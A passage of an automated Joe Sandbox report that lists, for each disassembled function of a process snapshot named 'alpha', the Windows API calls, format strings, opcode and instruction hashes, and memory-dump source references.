                                        • API String ID: 3476366620-0
                                        • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                        • Instruction ID: fd60c76b9ba8337292053a8195d0fcaf6608b28d666ec45c014a8af0b471e5d5
                                        • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                        • Instruction Fuzzy Hash: ED210E20B0DA4296FA547F51A8192B8EB61FF99735FC45275CF3E422E1FF3CA6048620
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                        • String ID: %9d
                                        • API String ID: 1006866328-2241623522
                                        • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                        • Instruction ID: c0406630178e919f5c39a740f1ad641f226606c91caf06dc7eb2e2a530c9b8e5
                                        • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                        • Instruction Fuzzy Hash: FA515C72B0C6429AE700AF51E8545A8BBA4FB847B4F804635DF3D537A5EF3DA600CB60
                                        APIs
                                        Similarity
                                        • API ID: memset
                                        • String ID:
                                        • API String ID: 2221118986-0
                                        • Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                        • Instruction ID: 2aa5faddacd4816f65139f6c6aa3473d32ff80dd0db8fa7b5795c93072145af3
                                        • Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                        • Instruction Fuzzy Hash: 45C1D622B0DB8286EB60EF11E850AB9A7A5FB957A4F844135DF2D87794EF3CD641C310
                                        Similarity
                                        • API ID: Heap$AllocProcess
                                        • String ID:
                                        • API String ID: 1617791916-0
                                        • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                        • Instruction ID: fc4a23ea06fe9a48cf6d7030ce535a36f022d53df10a6502ff3e5659ec4f7d68
                                        • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                        • Instruction Fuzzy Hash: 99A1A321B1CA4286EB54BF26A851679A6E5FF847A0FC04135DF6E83791FF3DE6018720
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: memset$DiskFreeSpace
                                        • String ID: %5lu
                                        • API String ID: 2448137811-2100233843
                                        • Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                        • Instruction ID: 1f6be415052ee40999cd9b5097935c276223a83d1e78d17f60f93005e37f7571
                                        • Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                        • Instruction Fuzzy Hash: C2418026708AC195EB61EF51E8446EAF361FB84798F848035EE5D0B748EF7CD249C710
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: GeToken: (%x) '%s'
                                        • API String ID: 2081463915-1994581435
                                        • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                        • Instruction ID: 716967c7789859c82151f0da52f2a43000094e8ab4d65bb4dd624694a8f11cbd
                                        • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                        • Instruction Fuzzy Hash: 5C718E20F0D64385FBA4BF65A858679A6A0AF517B4FC40539DF2D866D0FF3DE6818320
                                        APIs
                                        Similarity
                                        • API ID: wcschr
                                        • String ID:
                                        • API String ID: 1497570035-0
                                        • Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                        • Instruction ID: c24db22a44daf8a61e65191ec07c3fab2aa108e38eae248097ed8feb44924731
                                        • Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                        • Instruction Fuzzy Hash: 66C1E322B1C64282EA54BF16A841679E7A5FF84BA0F844135DF7E83795FF3CE6408720
                                        APIs
                                        Similarity
                                        • API ID: Find$File$CloseFirstNext
                                        • String ID:
                                        • API String ID: 3541575487-0
                                        • Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                        • Instruction ID: f02c7f471ae96e59e4a448bcc0b6b95a4ce6efb2e0c1498a2a5951645f0592cc
                                        • Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                        • Instruction Fuzzy Hash: 60A1D161B1C69241EA64BF6694142BAE691AF44BF4FC44235DF7E477C4FE3CEA418320
                                        APIs
                                          • Part of subcall function 00007FF7CD48CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDA6
                                          • Part of subcall function 00007FF7CD48CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDBD
                                        • _pipe.MSVCRT ref: 00007FF7CD486C1E
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD486CD1
                                        • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7CD486CFB
                                        Similarity
                                        • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                        • String ID:
                                        • API String ID: 624391571-0
                                        • Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                        • Instruction ID: e5bee907c2bb6143c8eec654be8e54d967f143bde9a6bc1793a9ea8363fca97c
                                        • Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                        • Instruction Fuzzy Hash: DC715C31B0D6428AE754BF25D84507CF6A1EF887B4B948238DF6D962D5EF3CEA418720
                                        APIs
                                        Similarity
                                        • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                        • String ID:
                                        • API String ID: 4268342597-0
                                        • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                        • Instruction ID: 18802e845009af585dac8373c939c502d720a07f1a1386048de5869bf3eae66b
                                        • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                        • Instruction Fuzzy Hash: 95814E22B0CB8281EB65AF26A844279F7A5FB55BA4F984135CF6D03754EF3CE641C720
                                        APIs
                                        Similarity
                                        • API ID: OpenToken$CloseProcessThread
                                        • String ID:
                                        • API String ID: 2991381754-0
                                        • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                        • Instruction ID: b148f83a734d45f71f6273bfccf4b920153737300f534dd6d75ed4d7485e68fa
                                        • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                        • Instruction Fuzzy Hash: 77216D32B0C69287E700AFA9D4407BDFB65EB857B0F904135DF6942694EF78EA48CB10
                                        APIs
                                        • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF7CD4AC59E), ref: 00007FF7CD485879
                                          • Part of subcall function 00007FF7CD4858D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD485903
                                          • Part of subcall function 00007FF7CD4858D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD485943
                                          • Part of subcall function 00007FF7CD4858D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD485956
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValueVersion
                                        • String ID: %d.%d.%05d.%d
                                        • API String ID: 2996790148-3457777122
                                        • Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                        • Instruction ID: 57a0bd3d4536194e0eedd8cf0bf29e23db072fa864f1a048413ffbf5e5428583
                                        • Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                        • Instruction Fuzzy Hash: 08F0A771B0C78197D310AF66B44406AF651FB887D0F944138DE5907B59DF3CD614CB50
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$ErrorFileFindFirstLast
                                        • String ID:
                                        • API String ID: 2831795651-0
                                        • Opcode ID: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                        • Instruction ID: a7589593bd7c36986aa624acc248b450844a0b29b7ba05ab9c4f225ef977c75a
                                        • Opcode Fuzzy Hash: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                        • Instruction Fuzzy Hash: ABD1C57270C68186E760AF22E4406BAB7A6FB447A8F905135DF6E07794EF3CDA41C710
                                        APIs
                                        • memset.MSVCRT ref: 00007FF7CD487DA1
                                          • Part of subcall function 00007FF7CD49417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7CD4941AD
                                          • Part of subcall function 00007FF7CD48D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D46E
                                          • Part of subcall function 00007FF7CD48D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D485
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D4EE
                                          • Part of subcall function 00007FF7CD48D3F0: iswspace.MSVCRT ref: 00007FF7CD48D54D
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D569
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D58C
                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7CD487EB7
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                        • String ID:
                                        • API String ID: 168394030-0
                                        • Opcode ID: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                        • Instruction ID: f8131d008688b938a6b17fca2f1a4d11fd53a46948c06f1bc5ac3527d19afa75
                                        • Opcode Fuzzy Hash: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                        • Instruction Fuzzy Hash: 88A1F621B1CA4285FB64BF2698506B9A392BF857A4F804135DF2E876E5FF3CE6058310
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: InformationQueryToken
                                        • String ID:
                                        • API String ID: 4239771691-0
                                        • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                        • Instruction ID: b5e61d702ec6bb4428a5d00bc3d7179e4993fe37bc4c7e1ca3067d33fa07a06f
                                        • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                        • Instruction Fuzzy Hash: EF11707270C781CBEB109F12E4007A9FBA9FB947A5F404131DF5802A94EB7DE688CB60
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: FileInformation$HandleQueryVolume
                                        • String ID:
                                        • API String ID: 2149833895-0
                                        • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                        • Instruction ID: d8cf5a1dc9dfdaae3e85dac23042a28bfcd4c2c9cf66280bb4837c6f374a4373
                                        • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                        • Instruction Fuzzy Hash: 6F11C13270C68186E7209F51F0417AAF7A1FB44B54F804131DFAD42A58EFBCD948CB10
                                        APIs
                                        • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF7CD4A4227), ref: 00007FF7CD4A8678
                                        • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?,?,?,00000000,00007FF7CD4A4227), ref: 00007FF7CD4A86D4
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Time$System$File
                                        • String ID:
                                        • API String ID: 2838179519-0
                                        • Opcode ID: 62ebdb23c5db016c2826862ffbff753f6fa70ff692e943220732cd29ca21f8c9
                                        • Instruction ID: 11ad356e9a6df08d54e35091ff7eec6f6140c7ef2ef28cb07bc5a158566ea32d
                                        • Opcode Fuzzy Hash: 62ebdb23c5db016c2826862ffbff753f6fa70ff692e943220732cd29ca21f8c9
                                        • Instruction Fuzzy Hash: 9B115E56618680C6D7249F66E00013AF370FFACB19B545122FE9D82764FB3CC642CB28
                                        APIs
                                          • Part of subcall function 00007FF7CD48D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D46E
                                          • Part of subcall function 00007FF7CD48D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D485
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D4EE
                                          • Part of subcall function 00007FF7CD48D3F0: iswspace.MSVCRT ref: 00007FF7CD48D54D
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D569
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D58C
                                        • towupper.MSVCRT ref: 00007FF7CD4885D4
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                        • String ID:
                                        • API String ID: 3520273530-0
                                        • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                        • Instruction ID: 78578aebde69f18ec5c496cb310a212fac845c20a4c7e66b587c845a56b1eb55
                                        • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                        • Instruction Fuzzy Hash: 7961C321B1C20285E764BE25E944779F6A1FB047B4FC08136DF3E962D5EF3CAA808321
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: InformationQueryToken
                                        • String ID:
                                        • API String ID: 4239771691-0
                                        • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                        • Instruction ID: 86df182905fd49ec473f8129e1ce23b0907d6280a03b7e7d5b675f79d496c987
                                        • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                        • Instruction Fuzzy Hash: 78F01CB3704B81CBD7009F65E58889CBB78F754B94B95853ACF2803704EB75DAA4CB50
                                        APIs
                                        • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7CD4993BB
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                        • Instruction ID: 385f7ae384bfca10f038a4906c284339e55c12bb0fe179a327bac6f84f02feb3
                                        • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                        • Instruction Fuzzy Hash: 14B09210F29802E1DA04BF629C850A062A16BAC720FC01831CA1E80160EE1CA29B8710
                                        APIs
                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF7CD48F52A,00000000,00000000,?,00000000,?,00007FF7CD48E626,?,?,00000000,00007FF7CD491F69), ref: 00007FF7CD48F8DE
                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F8FB
                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F951
                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F96B
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48FA8E
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD48FB14
                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48FB2D
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48FBEA
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD48F996
                                          • Part of subcall function 00007FF7CD490010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7CD4A849D,?,?,?,00007FF7CD4AF0C7), ref: 00007FF7CD490045
                                          • Part of subcall function 00007FF7CD490010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7CD4AF0C7,?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD490071
                                          • Part of subcall function 00007FF7CD490010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD490092
                                          • Part of subcall function 00007FF7CD490010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7CD4900A7
                                          • Part of subcall function 00007FF7CD490010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7CD490181
                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD49D401
                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD49D41B
                                        • longjmp.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD49D435
                                        • longjmp.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD49D480
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
